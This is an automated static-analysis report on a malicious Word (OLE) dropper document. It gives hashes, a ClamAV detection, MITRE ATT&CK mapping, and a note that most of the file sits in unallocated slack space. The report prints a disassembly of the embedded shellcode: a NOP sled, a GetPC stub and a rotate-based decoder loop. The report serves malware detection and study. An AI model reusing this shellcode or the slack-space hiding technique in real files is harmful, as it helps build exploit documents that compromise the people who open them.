Doc.Dropper.Agent-7093179-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 064d18b1fcaef0b8…

MALICIOUS

Office (OLE)

114.5 KB Created: 2007-09-18 04:34:00 Authoring application: Microsoft Word 11. First seen: 2015-09-27
MD5: 4e813691517fa1da9ae005173a3df550 SHA-1: 443430481250b9b461a1812102a361b29adcd13d SHA-256: 064d18b1fcaef0b82c016350218c028594d341ad807bef21dc6d38d4b41f19c5
140 Risk Score

Malware Insights

Doc.Dropper.Agent-7093179-0 · confidence 95%

MITRE ATT&CK
T1204.002 Malicious File

The critical ClamAV detection of 'Doc.Dropper.Agent-7093179-0' strongly suggests this OLE document is a dropper. The presence of a NOP sled and a significant slack region further supports this, indicating the file is structured to facilitate the execution of a secondary malicious payload. No specific IOCs were extracted from the document body or scripts.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-7093179-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7093179-0
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00000C30  90                nop
00000C31  90                nop
00000C32  90                nop
00000C33  90                nop
00000C34  90                nop
00000C35  90                nop
00000C36  90                nop
00000C37  90                nop
00000C38  90                nop
00000C39  90                nop
00000C3A  90                nop
00000C3B  90                nop
00000C3C  90                nop
00000C3D  90                nop
00000C3E  90                nop
00000C3F  90                nop
00000C40  90                nop
00000C41  90                nop
00000C42  90                nop
00000C43  90                nop
00000C44  90                nop
00000C45  90                nop
00000C46  eb03              jmp 0xc4b
00000C48  5e                pop esi
00000C49  ffe6              jmp esi
00000C4B  e8f8ffffff        call 0xc48
00000C50  40                inc eax
00000C51  48                dec eax
00000C52  90                nop
00000C53  33c9              xor ecx, ecx
00000C55  66b90a01          mov cx, 0x10a
00000C59  90                nop
00000C5A  83c619            add esi, 0x19
00000C5D  56                push esi
00000C5E  8bfe              mov edi, esi
00000C60  ac                lodsb al, byte ptr [esi]
00000C61  90                nop
00000C62  c0c004            rol al, 4
00000C65  aa                stosb byte ptr es:[edi], al
00000C66  49                dec ecx
00000C67  75f7              jne 0xc60
00000C69  c3                ret
00000C6A  55                push ebp
00000C6B  b8ce38cec5        mov eax, 0xc5ce38ce
00000C70  3565757c54        xor eax, 0x547c7565
00000C75  0f4000            cmovo eax, dword ptr [eax]
00000C78  0000              add byte ptr [eax], al
00000C7A  099e7d000000      or dword ptr [esi + 0x7d], ebx
00000C80  f8                clc
00000C81  54                push esp
00000C82  cf                iretd
00000C83  46                inc esi
00000C84  1a03              sbb al, byte ptr [ebx]
00000C86  0000              add byte ptr [eax], al
00000C88  00b804c0b807      add byte ptr [eax + 0x7b8c004], bh
00000C8E  c1                .byte 0xc1
00000C8F  da                .byte 0xda
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 117,248 bytes but its declared streams total only 16,486 bytes — 100,762 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Open this report in the interactive analyzer, or submit your own file for analysis.